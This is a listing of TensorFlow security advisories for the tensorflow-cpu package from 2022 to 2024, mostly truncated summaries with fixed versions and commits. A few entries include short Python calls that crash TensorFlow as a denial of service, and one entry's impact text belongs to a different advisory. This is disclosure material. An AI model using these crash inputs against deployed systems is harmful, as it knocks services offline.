Advisories for Pypi/Tensorflow-Cpu package

2024
2023

TensorFlow Denial of Service vulnerability

Impact A malicious invalid input crashes a tensorflow model (Check Failed) and can be used to trigger a denial of service attack. To minimize the bug, we built a simple single-layer TensorFlow model containing a Convolution3DTranspose layer, which works well with expected inputs and can be deployed in real-world systems. However, if we call the model with a malicious input which has a zero dimension, it gives Check Failed failure …

Out-of-bounds Write

TensorFlow is an open source platform for machine learning. There is out-of-bounds access due to mismatched integer type sizes. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, if the parameter indices for DynamicStitch does not match the shape of the parameter data, it can trigger an stack OOB read. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, an out-of-bounds read is in GRUBlockCellGrad. A fix is included in TensorFlow 2.12.0 and 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, when the parameter summarize of tf.raw_ops.Print is zero, the new method SummarizeArray<bool> will reference to a nullptr, leading to a seg fault. A fix is included in TensorFlow version 2.12 and version 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source machine learning platform. Versions prior to 2.12.0 and 2.11.1 have a null pointer error in RandomShuffle with XLA enabled. A fix is included in TensorFlow 2.12.0 and 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, when SparseSparseMaximum is given invalid sparse tensors as inputs, it can give a null pointer error. A fix is included in TensorFlow version 2.12 and version 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, when ctx->step_containter() is a null ptr, the Lookup function will be executed with a null pointer. A fix is included in TensorFlow 2.12.0 and 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. The function tf.raw_ops.LookupTableImportV2 cannot handle scalars in the values parameter and gives an NPE. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Versions prior to 2.12.0 and 2.11.1 have a null point error in QuantizedMatMulWithBiasAndDequantize with MKL enabled. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

NULL Pointer Dereference

TensorFlow is an open source machine learning platform. When running versions prior to 2.12.0 and 2.11.1 with XLA, tf.raw_ops.ParallelConcat segfaults with a nullptr dereference when given a parameter shape with rank that is not greater than zero. A fix is available in TensorFlow 2.12.0 and 2.11.1.

Integer Overflow or Wraparound

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, integer overflow occurs when 2^31 <= num_frames * height * width * channels < 2^32, for example Full HD screencast of at least 346 frames. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

Incorrect Comparison

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, if the stride and window size are not positive for tf.raw_ops.AvgPoolGrad, it can give a floating point exception. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

Incorrect Comparison

TensorFlow is an open source machine learning platform. When running versions prior to 2.12.0 and 2.11.1 with XLA, tf.raw_ops.Bincount segfaults when given a parameter weights that is neither the same shape as parameter arr nor a length-0 tensor. A fix is included in TensorFlow 2.12.0 and 2.11.1.

Incorrect Comparison

TensorFlow is an open source platform for machine learning. Versions prior to 2.12.0 and 2.11.1 have a Floating Point Exception in TensorListSplit with XLA. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

Incorrect Comparison

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, there is a floating point exception in AudioSpectrogram. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

Incorrect Comparison

TensorFlow is an end-to-end open source platform for machine learning. Constructing a tflite model with a paramater filter_input_channel of less than 1 gives a FPE. This issue has been patched in version 2.12. TensorFlow will also cherrypick the fix commit on TensorFlow 2.11.1.

Heap-based Buffer Overflow

TensorFlow is an open source platform for machine learning. Attackers using Tensorflow prior to 2.12.0 or 2.11.1 can access heap memory which is not in the control of user, leading to a crash or remote code execution. The fix will be included in TensorFlow version 2.12.0 and will also cherrypick this commit on TensorFlow version 2.11.1.

Heap-based Buffer Overflow

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, there is a heap buffer overflow in TAvgPoolGrad. A fix is included in TensorFlow 2.12.0 and 2.11.1.

Double Free

TensorFlow is an open source machine learning platform. Prior to versions 2.12.0 and 2.11.1, nn_ops.fractional_avg_pool_v2 and nn_ops.fractional_max_pool_v2 require the first and fourth elements of their parameter pooling_ratio to be equal to 1.0, as pooling on batch and channel dimensions is not supported. A fix is included in TensorFlow 2.12.0 and 2.11.1.

2022

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. When the BaseCandidateSamplerOp function receives a value in true_classes larger than range_max, a heap oob read occurs. We have patched the issue in GitHub commit b389f5c944cadfdfe599b3f1e4026e036f30d2d4. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Reachable Assertion

TensorFlow is an open source platform for machine learning. If tf.raw_ops.TensorListResize is given a nonscalar value for input size, it results CHECK fail which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 888e34b49009a4e734c27ab0c43b0b5102682c56. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and …

Out-of-bounds Write

TensorFlow is an open source platform for machine learning. The security vulnerability results in FractionalMax(AVG)Pool with illegal pooling_ratio. Attackers using Tensorflow can exploit the vulnerability. They can access heap memory which is not in the control of user, leading to a crash or remote code execution. We have patched the issue in GitHub commit 216525144ee7c910296f5b05d214ca1327c9ce48. The fix will be included in TensorFlow 2.11.0. We will also cherry pick this commit …

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. If MirrorPadGrad is given outsize input paddings, TensorFlow will give a heap OOB error. We have patched the issue in GitHub commit 717ca98d8c3bba348ff62281fdf38dcb5ea1ec92. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. When ops that have specified input sizes receive a differing number of inputs, the executor will crash. We have patched the issue in GitHub commit f5381e0e10b5a61344109c1b7c174c68110f7629. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. If FractionMaxPoolGrad is given outsize inputs row_pooling_sequence and col_pooling_sequence, TensorFlow will crash. We have patched the issue in GitHub commit d71090c3e5ca325bdf4b02eb236cfb3ee823e927. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Out of bounds write in grappler in Tensorflow

Impact The function MakeGrapplerFunctionItem takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read or a crash is triggered. Patches We have patched the issue in GitHub commit a65411a1d69edfb16b25907ffb8f73556ce36bb7 . The fix will be included in TensorFlow 2.11.0. We will also cherrypick this commit on TensorFlow 2.10.1. For more information Please …

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. If a list of quantized tensors is assigned to an attribute, the pywrap code fails to parse the tensor and returns a nullptr, which is not caught. An example can be seen in tf.compat.v1.extract_volume_patches by passing in quantized tensors as input ksizes. We have patched the issue in GitHub commit e9e95553e5411834d215e6770c81a83a3d0866ce. The fix will be included in TensorFlow 2.11. We will …

Incorrect Type Conversion or Cast

TensorFlow is an open source platform for machine learning. When printing a tensor, we get it's data as a const char* array (since that's the underlying storage) and then we typecast it to the element type. However, conversions from char to bool are undefined if the char is not 0 or 1, so sanitizers/fuzzers will crash. The issue has been patched in GitHub commit 1be74370327. The fix will be included …

Incorrect Type Conversion or Cast

TensorFlow is an open source platform for machine learning. If BCast::ToShape is given input larger than an int32, it will crash, despite being supposed to handle up to an int64. An example can be seen in tf.experimental.numpy.outer by passing in large input to the input b. We have patched the issue in GitHub commit 8310bf8dd188ff780e7fc53245058215a05bdbe5. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on …

Incorrect Calculation of Buffer Size

TensorFlow is an open source platform for machine learning. When tf.raw_ops.ResizeNearestNeighborGrad is given a large size input, it overflows. We have patched the issue in GitHub commit 00c821af032ba9e5f5fa3fe14690c8d28a657624. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Incorrect Calculation of Buffer Size

TensorFlow is an open source platform for machine learning. When tf.raw_ops.ImageProjectiveTransformV2 is given a large output shape, it overflows. We have patched the issue in GitHub commit 8faa6ea692985dbe6ce10e1a3168e0bd60a723ba. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Incorrect Calculation of Buffer Size

TensorFlow is an open source platform for machine learning. tf.keras.losses.poisson receives a y_pred and y_true that are passed through functor::mul in BinaryOp. If the resulting dimensions overflow an int32, TensorFlow will crash due to a size mismatch during broadcast assignment. We have patched the issue in GitHub commit c5b30379ba87cbe774b08ac50c1f6d36df4ebb7c. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1 and 2.9.3, as these …

Incorrect Calculation of Buffer Size

TensorFlow is an open source platform for machine learning. When tf.raw_ops.FusedResizeAndPadConv2D is given a large tensor shape, it overflows. We have patched the issue in GitHub commit d66e1d568275e6a2947de97dca7a102a211e01ce. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. If ThreadUnsafeUnigramCandidateSampler is given input filterbank_channel_count greater than the allowed max size, TensorFlow will crash. We have patched the issue in GitHub commit 39ec7eaf1428e90c37787e5b3fbd68ebd3c48860. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. An input encoded that is not a valid CompositeTensorVariant tensor will trigger a segfault in tf.raw_ops.CompositeTensorVariantToComponents. We have patched the issue in GitHub commits bf594d08d377dc6a3354d9fdb494b32d45f91971 and 660ce5a89eb6766834bdc303d2ab3902aef99d3d. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Inputs dense_features or example_state_data not of rank 2 will trigger a CHECK fail in SdcaOptimizer. We have patched the issue in GitHub commit 80ff197d03db2a70c6a111f97dcdacad1b0babfa. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. An input token that is not a UTF-8 bytestring will trigger a CHECK fail in tf.raw_ops.PyFunc. We have patched the issue in GitHub commit 9f03a9d3bafe902c1e6beb105b2f24172f238645. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. If tf.raw_ops.TensorListConcat is given element_shape=[], it results segmentation fault which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit fc33f3dc4c14051a83eec6535b608abe1d355fde. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. If SparseFillEmptyRowsGrad is given empty inputs, TensorFlow will crash. We have patched the issue in GitHub commit af4a6a3c8b95022c351edae94560acc61253a1b8. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. An input sparse_matrix that is not a matrix with a shape with rank 0 will trigger a CHECK fail in tf.raw_ops.SparseMatrixNNZ. We have patched the issue in GitHub commit f856d02e5322821aad155dad9b3acab1e9f5d693. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Improper Input Validation

TensorFlow is an open source platform for machine learning. When running on GPU, tf.image.generate_bounding_box_proposals receives a scores input that must be of rank 4 but is not checked. We have patched the issue in GitHub commit cf35502463a88ca7185a99daa7031df60b3c1c98. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.

Heap overflow in `QuantizeAndDequantizeV2`

Impact The function MakeGrapplerFunctionItem takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read or a crash is triggered. import tensorflow as tf @tf.function def test(): tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5], input_min=[1.0], input_max=[10.0], signed_input=True, num_bits=1, range_given=True, round_mode='HALF_TO_EVEN', narrow_range=True, axis=0x7fffffff) test() Patches We have patched the issue in GitHub commit 7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb . The fix will be …

Always-Incorrect Control Flow Implementation

TensorFlow is an open source platform for machine learning. If a numpy array is created with a shape such that one element is zero and the others sum to a large number, an error will be raised. We have patched the issue in GitHub commit 2b56169c16e375c521a3bc8ea658811cc0793784. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are …

`CHECK` failure in `SobolSample` via missing validation

Impact Another instance of CVE-2022-35935, where SobolSample is vulnerable to a denial of service via assumed scalar inputs, was found and fixed. import tensorflow as tf tf.raw_ops.SobolSample(dim=tf.constant([1,0]), num_results=tf.constant([1]), skip=tf.constant([1])) Patches We have patched the issue in GitHub commits c65c67f88ad770662e8f191269a907bf2b94b1bf and 02400ea266bd811fc016a848445de1bbff3a23a0 The fix will be included in TensorFlow 2.11. We will also cherrypick both commits on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in …

`CHECK` fail in `TensorListScatter` and `TensorListScatterV2` in eager mode

Impact Another instance of CVE-2022-35991, where TensorListScatter and TensorListScatterV2 crash via non scalar inputs inelement_shape, was found in eager mode and fixed. import tensorflow as tf arg_0=tf.random.uniform(shape=(2, 2, 2), dtype=tf.float16, maxval=None) arg_1=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536) arg_2=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536) arg_3='' tf.raw_ops.TensorListScatter(tensor=arg_0, indices=arg_1, element_shape=arg_2, name=arg_3) Patches We have patched the issue in GitHub commit bf9932fc907aff0e9e8cccf769e8b00d30fd81a1 . The fix will be included in TensorFlow 2.11. We will also cherrypick this …

TensorFlow vulnerable to heap out of bounds read in filesystem glob matching

The general implementation for matching filesystem paths to globbing pattern is vulnerable to an access out of bounds of the array holding the directories: if (!fs->Match(child_path, dirs[dir_index])) { … } Since dir_index is unconditionaly incremented outside of the lambda function where the vulnerable pattern occurs, this results in an access out of bounds issue under certain scenarios. For example, if /tmp/x is a directory that only contains a single file …

TensorFlow vulnerable to null dereference on MLIR on empty function attributes

TensorFlow is an open source platform for machine learning. When mlir::tfg::ConvertGenericFunctionToFunctionDef is given empty function attributes, it gives a null dereference. We have patched the issue in GitHub commit aed36912609fc07229b4d0a7b44f3f48efc00fd0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

TensorFlow vulnerable to assertion fail on MLIR empty edge names

TensorFlow is an open source platform for machine learning. When mlir::tfg::ConvertGenericFunctionToFunctionDef is given empty function attributes, it crashes. We have patched the issue in GitHub commit ad069af92392efee1418c48ff561fd3070a03d7b. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

TensorFlow vulnerable to `CHECK` failures in `UnbatchGradOp`

TensorFlow is an open source platform for machine learning. The UnbatchGradOp function takes an argument id that is assumed to be a scalar. A nonscalar id can trigger a CHECK failure and crash the program. It also requires its argument batch_index to contain three times the number of elements as indicated in its batch_index.dim_size(0). An incorrect batch_index can trigger a CHECK failure and crash the program. We have patched the …

TensorFlow vulnerable to `CHECK` failure in tf.reshape via overflows

TensorFlow is an open source platform for machine learning. The implementation of tf.reshape op in TensorFlow is vulnerable to a denial of service via CHECK-failure (assertion failure) caused by overflowing the number of elements in a tensor. This issue has been patched in GitHub commit 61f0f9b94df8c0411f0ad0ecc2fec2d3f3c33555. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

TensorFlow vulnerable to `CHECK` fail in `RaggedTensorToVariant`

TensorFlow is an open source platform for machine learning. If RaggedTensorToVariant is given a rt_nested_splits list that contains tensors of ranks other than one, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 88f93dfe691563baa4ae1e80ccde2d5c7a143821. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and …

TensorFlow vulnerable to `CHECK` fail in `Conv2DBackpropInput`

TensorFlow is an open source platform for machine learning. The implementation of Conv2DBackpropInput requires input_sizes to be 4-dimensional. Otherwise, it gives a CHECK failure which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 50156d547b9a1da0144d7babe665cf690305b33c. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When TensorListScatter and TensorListScatterV2 receive an element_shape of a rank greater than one, they give a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit bb03fdf4aae944ab2e4b35c7daa051068a8b7f61. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If QuantizeAndDequantizeV3 is given a nonscalar num_bits input tensor, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit f3f9cb38ecfe5a8a703f2c4a8fead434ef291713. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also …

Reachable Assertion

TensorFlow is an open source platform for machine learning. ParameterizedTruncatedNormal assumes shape is of type int32. A valid shape of type int64 results in a mismatched type CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 72180be03447a10810edca700cbc9af690dfeb51. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tf.quantization.fake_quant_with_min_max_vars_gradient receives input min or max that is nonscalar, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit f3cf67ac5705f4f04721d15e485e192bb319feed. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When DrawBoundingBoxes receives an input boxes that is not of dtype float, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit da0d65cdc1270038e72157ba35bf74b85d9bda11. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected …

Reachable Assertion

TensorFlow is an open source platform for machine learning. The implementation of AvgPoolGrad does not fully validate the input orig_input_shape. This results in a CHECK failure which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 3a6ac52664c6c095aa2b114e742b0aa17fdce78f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When MaxPool receives a window size input array ksize with dimensions greater than its input tensor input, the GPU kernel gives a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 32d7bd3defd134f21a4e344c8dfd40099aaf6b18. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tensorflow::full_type::SubstituteFromAttrs receives a FullTypeDef& t that is not exactly three args, it triggers a CHECK-fail instead of returning a status. We have patched the issue in GitHub commit 6104f0d4091c260ce9352f9155f7e9b725eab012. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tf.quantization.fake_quant_with_min_max_vars_per_channel_gradient receives input min or max of rank other than 1, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit f3cf67ac5705f4f04721d15e485e192bb319feed. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When CollectiveGather receives an scalar input input, it gives a CHECK fails that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit c1f491817dec39a26be3c574e86a88c30f3c4770. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tf.random.gamma receives large input shape and rates, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 552bfced6ce4809db5f3ca305f60ff80dd40c5a3. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When SetSize receives an input set_shape that is not a 1D tensor, it gives a CHECK fails that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit cf70b79d2662c0d3c6af74583641e345fc939467. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When RandomPoissonV2 receives large input shape and rates, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 552bfced6ce4809db5f3ca305f60ff80dd40c5a3. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported …

Reachable Assertion

TensorFlow is an open source platform for machine learning. In core/kernels/list_kernels.cc's TensorListReserve, num_elements is assumed to be a tensor of size 1. When a num_elements of more than 1 element is provided, then tf.raw_ops.TensorListReserve fails the CHECK_EQ in CheckIsAlignedAndSingleElement. We have patched the issue in GitHub commit b5f6fbfba76576202b72119897561e3bd4f179c7. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When AudioSummaryV2 receives an input sample_rate with more than one element, it gives a CHECK fails that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bf6b45244992e2ee543c258e519489659c99fb7f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Reachable Assertion

TensorFlow is an open source platform for machine learning. The implementation of AvgPool3DGradOp does not fully validate the input orig_input_shape. This results in an overflow that results in a CHECK failure which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 9178ac9d6389bdc54638ab913ea0e419234d14eb. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, …

Reachable Assertion

TensorFlow is an open source platform for machine learning. FractionalMaxPoolGrad validates its inputs with CHECK failures instead of with returning errors. If it gets incorrectly sized inputs, the CHECK failure can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 8741e57d163a079db05a7107a7609af70931def4. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When tf.linalg.matrix_rank receives an empty input a, the GPU kernel gives a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit c55b476aa0e0bd4ee99d0f3ad18d9d706cd1260a. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When Conv2DBackpropInput receives empty out_backprop inputs (e.g. [3, 1, 0, 1]), the current CPU/GPU kernels CHECK fail (one with dnnl, the other with cudnn). This can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 27a65a43cf763897fecfa5cdb5cc653fc5dd0346. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, …

Reachable Assertion

TensorFlow is an open source platform for machine learning. The AvgPoolOp function takes an argument ksize that must be positive but is not checked. A negative ksize can trigger a CHECK failure and crash the program. We have patched the issue in GitHub commit 3a6ac52664c6c095aa2b114e742b0aa17fdce78f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If tf.sparse.cross receives an input separator that is not a scalar, it gives a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 83dcb4dbfa094e33db084e97c4d0531a559e0ebf. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If FakeQuantWithMinMaxVarsPerChannel is given min or max tensors of a rank other than one, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When TensorListFromTensor receives an element_shape of a rank greater than one, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 3db59a042a38f4338aa207922fa2f476e000a6ee. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If Save or SaveSlices is run over tensors of an unsupported dtype, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 5dd7b86b84a864b834c6fa3d7f9f51c87efa99d4. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When Unbatch receives a nonscalar input id, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 4419d10d576adefa36b0e0a9425d2569f7c0189f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. …

Reachable Assertion

TensorFlow is an open source platform for machine learning. DenseBincount assumes its input tensor weights to either have the same shape as its input tensor input or to be length-0. A different weights shape will trigger a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bf4c14353c2328636a18bfad1e151052c81d5f43. The fix will be included in TensorFlow 2.10.0. We will also …

Reachable Assertion

TensorFlow is an open source platform for machine learning. The implementation of SobolSampleOp is vulnerable to a denial of service via CHECK-failure (assertion failure) caused by assuming input(0), input(1), and input(2) to be scalar. This issue has been patched in GitHub commit c65c67f88ad770662e8f191269a907bf2b94b1bf. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If LRNGrad is given an output_image input tensor that is not 4-D, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bd90b3efab4ec958b228cd7cfe9125be1c0cf255. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Reachable Assertion

